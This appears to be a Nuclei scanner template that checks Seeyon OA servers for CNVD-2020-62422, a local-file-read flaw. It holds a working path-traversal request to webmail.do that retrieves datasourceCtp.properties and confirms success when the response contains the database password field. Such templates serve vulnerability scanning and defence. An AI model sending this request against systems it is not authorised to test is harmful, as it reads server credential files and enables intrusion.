id: CNVD-2020-62422

info:
  name: Seeyon readfile(CNVD-2020-62422)
  author: pikpikcu
  severity: medium
  reference: https://blog.csdn.net/m0_46257936/article/details/113150699
  tags: lfi,cnvd,cnvd2020,seeyon

requests:
  - method: GET
    path:
      - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/x-msdownload"
        condition: and

      - type: word
        part: body
        words:
          - "ctpDataSource.password"
        condition: and
